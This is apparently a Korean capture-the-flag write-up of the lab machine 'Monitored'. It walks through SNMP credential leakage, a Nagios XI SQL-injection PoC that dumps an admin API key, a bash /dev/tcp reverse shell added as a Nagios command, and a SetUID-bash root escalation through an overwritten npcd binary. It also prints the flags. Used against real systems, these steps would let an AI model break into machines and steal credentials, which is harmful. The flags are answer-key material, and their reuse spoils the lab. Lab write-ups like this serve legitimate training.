Proof of Concept
10.129.230.96
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
389/tcp open ldap
443/tcp open https
5667/tcp open unknown
123/udp open ntp
161/udp open snmpInitial Access
80포트 접속 시 https://nagios.monitored.htb로 리다이렉트 됨
┌──(kali㉿kali)-[~/Monitored]
└─$ curl http://10.129.230.96
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://nagios.monitored.htb/">here</a>.</p>
<hr>
<address>Apache/2.4.56 (Debian) Server at 10.129.230.96 Port 80</address>
</body></html>/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Monitored]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.230.96 monitored.htb nagios.monitored.htbNagios XI 사용중인 것을 확인
┌──(kali㉿kali)-[~/Monitored]
└─$ whatweb https://nagios.monitored.htb
https://nagios.monitored.htb [200 OK] Apache[2.4.56], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.56 (Debian)], IP[10.129.230.96], JQuery[3.6.0], Script[text/javascript], Title[Nagios XI]SNMP community string 확인
- public
┌──(kali㉿kali)-[~/Monitored]
└─$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.129.230.96
Scanning 1 hosts, 3218 communities
10.129.230.96 [public] Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64
10.129.230.96 [public] Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64SNMP 기록 확인
┌──(kali㉿kali)-[~/Monitored]
└─$ snmpbulkwalk -v2c -c public 10.129.230.96 | tee snmp
iso.3.6.1.2.1.1.1.0 = STRING: "Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (567930) 1:34:39.30
iso.3.6.1.2.1.1.4.0 = STRING: "Me <root@monitored.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "monitored"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1747) 0:00:17.47
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
<SNIP>
iso.3.6.1.2.1.88.1.4.3.1.3.6.95.115.110.109.112.100.95.109.116.101.84.114.105.103.103.101.114.70.97.108.108.105.110.103 = STRING: "_triggerFire"
iso.3.6.1.2.1.88.1.4.3.1.3.6.95.115.110.109.112.100.95.109.116.101.84.114.105.103.103.101.114.70.105.114.101.100 = STRING: "_triggerFire"
iso.3.6.1.2.1.88.1.4.3.1.3.6.95.115.110.109.112.100.95.109.116.101.84.114.105.103.103.101.114.82.105.115.105.110.103 = STRING: "_triggerFire"
iso.3.6.1.2.1.92.1.1.1.0 = Gauge32: 1000
iso.3.6.1.2.1.92.1.1.2.0 = Gauge32: 1440
iso.3.6.1.2.1.92.1.2.1.0 = Counter32: 0
iso.3.6.1.2.1.92.1.2.2.0 = Counter32: 0SNMP 기록에서 svc 계정 정보 발견
- svc:XjH7VCehowpR1xZB
┌──(kali㉿kali)-[~/Monitored]
└─$ cat snmp | grep -i /
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/boot/vmlinuz-5.10.0-28-amd64 root=UUID=d8761c35-f10f-4e79-b24c-38a65ad7ce1b ro net.ifnames=0 biosdevname=0 quiet
iso.3.6.1.2.1.25.2.3.1.3.35 = STRING: "/run"
iso.3.6.1.2.1.25.2.3.1.3.36 = STRING: "/"
iso.3.6.1.2.1.25.2.3.1.3.38 = STRING: "/dev/shm"
iso.3.6.1.2.1.25.2.3.1.3.39 = STRING: "/run/lock"
iso.3.6.1.2.1.25.3.8.1.2.5 = STRING: "/run"
iso.3.6.1.2.1.25.3.8.1.2.6 = STRING: "/"
iso.3.6.1.2.1.25.3.8.1.2.8 = STRING: "/dev/shm"
iso.3.6.1.2.1.25.3.8.1.2.9 = STRING: "/run/lock"
iso.3.6.1.2.1.25.4.2.1.2.6 = STRING: "kworker/0:0H-events_highpri"
iso.3.6.1.2.1.25.4.2.1.2.11 = STRING: "ksoftirqd/0"
iso.3.6.1.2.1.25.4.2.1.2.13 = STRING: "migration/0"
iso.3.6.1.2.1.25.4.2.1.2.14 = STRING: "kworker/0:1-events"
iso.3.6.1.2.1.25.4.2.1.2.15 = STRING: "cpuhp/0"
iso.3.6.1.2.1.25.4.2.1.2.16 = STRING: "cpuhp/1"
iso.3.6.1.2.1.25.4.2.1.2.17 = STRING: "migration/1"
iso.3.6.1.2.1.25.4.2.1.2.18 = STRING: "ksoftirqd/1"
<SNIP>
iso.3.6.1.2.1.25.4.2.1.5.1401 = STRING: "-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.1402 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.7277 = STRING: "-c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1"
iso.3.6.1.2.1.25.4.2.1.5.7278 = STRING: "-q /usr/local/nagiosxi/cron/cmdsubsys.php"웹 서비스에서 svc 계정으로 로그인 시 “The specified user account has been disabled or does not exist.” 메시지가 뜸. 해당 메시지는 잘못된 계정정보를 입력했을 때와 메시지가 다르므로, 비활성화 된 것으로 유추 가능
Nagios XI API를 이용하여 인증 토큰 발급
- ddd932053efa5cf53b1d06734370c38772fc9bcc
┌──(kali㉿kali)-[~/Monitored/CVE-2023-47400]
└─$ curl "http://10.129.230.96/nagiosxi/api/v1/authenticate?pretty=1" -d "username=svc&password=XjH7VCehowpR1xZB"
{
"username": "svc",
"user_id": "2",
"auth_token": "ddd932053efa5cf53b1d06734370c38772fc9bcc",
"valid_min": 5,
"valid_until": "Sat, 07 Feb 2026 06:33:51 -0500"
}해당 토큰을 이용하여 메인 페이지 접근에 성공하였으며, 5.11.0 버전을 사용하는 것을 확인
My Account > Account Information에서 API Key 발견
- 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK
Nagios XI 5.11.0 버전에서 SQL Injection 취약점 발견 (CVE-2023-40931)
POC 다운로드
┌──(kali㉿kali)-[~/Monitored]
└─$ git clone https://github.com/G4sp4rCS/CVE-2023-40931-POC.git
Cloning into 'CVE-2023-40931-POC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 18 (delta 6), reused 14 (delta 2), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 5.24 KiB | 5.24 MiB/s, done.
Resolving deltas: 100% (6/6), done.POC 실행하여 DB 내 관리자 계정과 API Key 획득
- nagiosadmin:IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL
┌──(kali㉿kali)-[~/Monitored/CVE-2023-40931-POC]
└─$ python exploit.py -t https://nagios.monitored.htb/nagiosxi -u svc -p XjH7VCehowpR1xZB
[+] Token obtained: 997443f8f8fe6d5ffedf341e62ef8e13c995ddd4
[+] Main page loaded successfully with the token.
[+] Possible SQL injection detected (error message found).
[+] Endpoint response:
{"message":"Failed to acknowledge message.","msg_type":"error"}
[*] Running sqlmap to extract the database...
[*] Command: sqlmap -u https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=997443f8f8fe6d5ffedf341e62ef8e13c995ddd4 --data=action=acknowledge_banner_message&id=3 --cookie nagiosxi=2q708cf9m24iackltultr2cjgn -p id --batch --dump --level 4 --risk 3 --threads 10
<SNIP>
[07:47:30] [INFO] retrieved: '1701427555'
[07:47:30] [INFO] retrieved: '1699724476'
[07:47:31] [INFO] retrieved: '0'
[07:47:31] [INFO] retrieved: '1699697433'
[07:47:32] [INFO] retrieved: '10'
[07:47:32] [INFO] retrieved: '$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C'
[07:47:33] [INFO] retrieved: '1'
[07:47:33] [INFO] retrieved: '$2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK'
[07:47:34] [INFO] retrieved: 'nagiosadmin'
[07:47:34] [INFO] retrieved: '2'
[07:47:35] [INFO] retrieved: 'svc'
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email | name | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1 | admin@monitored.htb | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 |
| 2 | svc@monitored.htb | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1770463345 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 10 | 1699697433 |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
<SNIP>획득한 API Key를 이용하여 admin-exploit.py 실행 시 관리자 계정이 생성되나 리버스쉘 연결은 안됨
┌──(kali㉿kali)-[~/Monitored/CVE-2023-40931-POC]
└─$ python admin-exploit.py --target https://nagios.monitored.htb/nagiosxi --api_key IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL --nc_ip 10.10.14.17 --nc_port 1234
[+] Admin account created: 8bU94Aot / VDbo1gNZbLdz
[+] Attempting to execute reverse shell...생성된 계정으로 Nagios XI 웹서비스 로그인 후 Configure > Core Config Manager > Commands > Add New 에서 다음과 같이 객체 추가
- Command Name: reverseshell
- Command Line: /bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.17/5555 0>&1’
NC 리버스 쉘 리스너 실행
┌──(kali㉿kali)-[~/Monitored]
└─$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...Configure > Core Config Manager > Recently Changed Hosts and Services > localhost > Check command 에서 reverseshell 선택 후 Run Check Commands 버튼 클릭 시 명령어가 실행되며 리버스 쉘 연결 성공
┌──(kali㉿kali)-[~/Monitored]
└─$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.15.237] 40354
bash: cannot set terminal process group (2408): Inappropriate ioctl for device
bash: no job control in this shell
nagios@monitored:~Read user.txt
nagios@monitored:~$ cat user.txt
cat user.txt
3bd04b30e938d1ca897d19f7bf889c34
nagios@monitored:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:32:0a brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.15.237/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3120sec preferred_lft 3120sec
inet6 dead:beef::250:56ff:feb0:320a/64 scope global dynamic mngtmpaddr
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:feb0:320a/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
sudo 권한으로 실행 가능한 명령어 확인
nagios@monitored:~$ sudo -l
sudo -l
Matching Defaults entries for nagios on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nagios may run the following commands on localhost:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/migrate/migrate.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *sudo 권한으로 실행 가능한 /etc/init.d/npcd 바이너리가 해당 경로에 없는 것을 확인
nagios@monitored:~$ ls -al /etc/init.d/npcd
ls -al /etc/init.d/npcd
ls: cannot access '/etc/init.d/npcd': No such file or directorynpcd 바이너리 파일이 /usr/local/nagios/bin/npcd 경로에 있으며, nagios 사용자가 쓰기 권한을 보유한 것을 확인
nagios@monitored:~$ find / -name npcd 2>/dev/null
find / -name npcd 2>/dev/null
/usr/local/nagios/bin/npcd
nagios@monitored:~$ ls -al /usr/local/nagios/bin/npcd
ls -al /usr/local/nagios/bin/npcd
-rwxr-xr-- 1 nagios nagios 31584 Nov 9 2023 /usr/local/nagios/bin/npcd/bin/bash 바이너리에 SetUID를 설정하는 npcd 바이너리 파일 생성
nagios@monitored:~$ cat > /tmp/npcd.c << 'EOF'
#include <stdlib.h>
int main() {
system("chmod u+s /bin/bash");
return 0;
}
EOF
cat > /tmp/npcd.c << 'EOF'
> #include <stdlib.h>
> int main() {
> system("chmod u+s /bin/bash");
> return 0;
> }
> EOFnagios@monitored:~$ gcc /tmp/npcd.c -o /tmp/npcd
gcc /tmp/npcd.c -o /tmp/npcd기존 npcd 바이너리 파일을 새로 만든 npcd 바이너리 파일로 overwirte
nagios@monitored:~$ mv /usr/local/nagios/bin/npcd /usr/local/nagios/bin/npcd.bak
nagios@monitored:~$ cp /tmp/npcd /usr/local/nagios/bin/npcd
cp /tmp/npcd /usr/local/nagios/bin/npcd
nagios@monitored:~$ chmod +x /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd/usr/local/nagiosxi/scripts/manage_services.sh을 사용하여 npcd 서비스 재시작
nagios@monitored:~$ sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
nagios@monitored:~$ sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcdnpcd 서비스 재시작 후 /bin/bash 바이너리를 확인해보면 SetUID가 설정되었으며, 이를 실행하여 root 쉘 획득
nagios@monitored:~$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
nagios@monitored:~$ /bin/bash -p
/bin/bash -p
bash-5.1# whoami
whoami
rootRead root.txt
bash-5.1# cat /root/root.txt
cat /root/root.txt
3890227f61661f08dc4fc316c3dfb586
bash-5.1# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:d2:52 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.16.0/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3101sec preferred_lft 3101sec
inet6 dead:beef::250:56ff:feb0:d252/64 scope global dynamic mngtmpaddr
valid_lft 86395sec preferred_lft 14395sec
inet6 fe80::250:56ff:feb0:d252/64 scope link
valid_lft forever preferred_lft forever